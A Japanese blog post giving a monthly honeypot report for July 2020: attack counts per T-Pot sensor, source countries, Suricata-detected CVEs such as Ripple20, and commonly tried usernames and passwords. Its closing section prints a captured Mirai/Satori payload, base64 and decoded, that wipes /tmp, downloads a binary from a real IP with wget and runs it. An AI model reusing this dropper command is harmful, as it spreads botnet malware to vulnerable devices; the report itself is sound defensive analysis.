Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2020年7月)

8月に入った。本来はオリンピック期間である。
8/1に関東も梅雨明けされた。このぐらいの涼しさであればオリンピックも快適に開催できたかもしれない。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

7月は無し。

前提条件

運用日時:2020年7月6日-2020年7月31日
運用期間:25日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先々月比
1 Dionaea 3,794,107 ▲864,338
2 Cowrie 3,041,517 △19,037
3 Heralding 441,903 ▲943,753
4 Honeytrap 389,790 ▲213,499
5 Rdpy 67,316 ▲1,106
6 Mailoney 12,896 ▲22,380
7 Tanner 5,003 ▲47
8 Adbhoney 3,585 △1,159
9 Ciscoasa 2,209 ▲219
10 Medpot 1,509 △535
11 ElasticPot 913 ▲313
12 CitrixHoneypot 573 -
13 ConPot 222 ▲151
  • Result
    • 先月より観測期間は減少しているがCowrieへの攻撃件数は増加していた。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Ireland 1,029,249 4(↑)
2 Russia 714,993 1(↓)
3 Vietnam 666,454 3(→)
4 China 636,493 2(↓)
5 Netherlands 535,002 圏外(↑)
6 India 302,099 7(↑)
7 Panama 294,041 13(↑)
8 United States 259,770 5(↓)
9 Brazil 246,462 8(↓)
10 Ukraine 227,893 16(↑)
11 Indonesia 227,659 9(↓)
12 Germany 205,315 圏外(↑)
13 France 175,639 14(↑)
14 Venezuela 167,362 11(↓)
15 Republic of Moldova 161,765 6(↓)
16 Taiwan 144,357 17(↑)
17 Turkey 143,415 15(↓)
18 Japan 117,070 12(↓)
19 Thailand 93,604 20(↓)
20 Pakistan 86,479 圏外(↑)
  • Result
    • アイルランド(1位)からのアクセスが優位に増えていた。何かキャンペーン的なものでもあったのだろうか?
    • ロシア(2位),ベトナム(3位),中国(4位)は相変わらず。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID CNT
1 CVE-2020-11899 44,678
2 CVE-2020-11910 161
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 32
4 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 26
5 CVE-2020-8515 CVE-2020-8515 14
  • Result
    • Ripple20の攻撃が今月も多かった。世界的に対策が進むまでは数か月はこの状態が続くと予想される。
    • 新規の攻撃は無し。

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 20)で記載する。
No ユーザ名 件数
1 root 157,648
2 admin 75,347
3 user 21,645
4 support 16,588
5 sa 11,309
6 nproc 4,773
7 test 2,449
8 postgres 1,781
9 22 1,453
10 ubuntu 1,291
11 sh 1,075
12 enable 1,010
13 oracle 875
14 git 849
15 www 835
16 ftpuser 733
17 guest 635
18 deploy 524
19 mysql 490
20 nagios 438
  • Result
    • 先月から変更なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 20)を以下に記載する。
No パスワード 件数
1 admin 166,216
2 & 20,401
3 user 20,056
4 support 16,368
5 123456 16,042
6 password 5,459
7 123 4,916
8 nproc 4,773
9 12345678 3,016
10 12345 2,501
11 1234 2,339
12 1,997
13 1 1,218
14 system 1,096
15 shell 1,078
16 Password 1,011
17 123123 931
18 1q2w3e4r 856
19 qwerty 820
20 test 815
  • Result
    • 先月から変更なし

最後に

  • 相変わらずmirai botnetの攻撃は続いている。
◆payload:
R0VUIC9zaGVsbD9jZCsvdG1wO3JtKy1yZisqO3dnZXQrOTUuMjEzLjE2NS40My9iaW5zL1VuSEFuYUFXLmFybTc7IGNobW9kKzc3NytVbkhBbmFBVy5hcm03OyAuL1VuSEFuYUFXLmFybTcrU2Nvb3QuSi5TUiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogSGVsbG8sIHdvcmxkDQpIb3N0OiA5NS4yMTMuMTY1LjQzOjgwDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=

base64デコードすると以下になる。

GET /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.43/bins/UnHAnaAW.arm7; chmod+777+UnHAnaAW.arm7; ./UnHAnaAW.arm7+Scoot.J.SR HTTP/1.1
User-Agent: Hello, world
Host: 95.213.165.43:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive

攻撃はLas Vegasからであり、Satoriの攻撃であった。
(※上記は一例であり、同様の攻撃は他の国からも受けている。)
http.http_user_agentHello, worldとなっており、分かりやすい。

同様のアクセスを他にも確認した。

input :
 /bin/busybox SATORI
ip_rep :
 known attacker
message :
 CMD: /bin/busybox SATORI

気になったのが日本の神戸周辺のinfowebドメインの端末からSatoriのアクセスがあったこと。
2020年06月23日(火)にinfowebドメインのメールアドレスは終了したと説明されていたが、
Satoriに感染してbotに参加している端末が一部残っているのかもしれない。

参考URL

お知らせ詳細「infowebドメインのメールアドレス終了のお知らせと設定変更について(2020年6月23日 終了しました)」|@niftyメール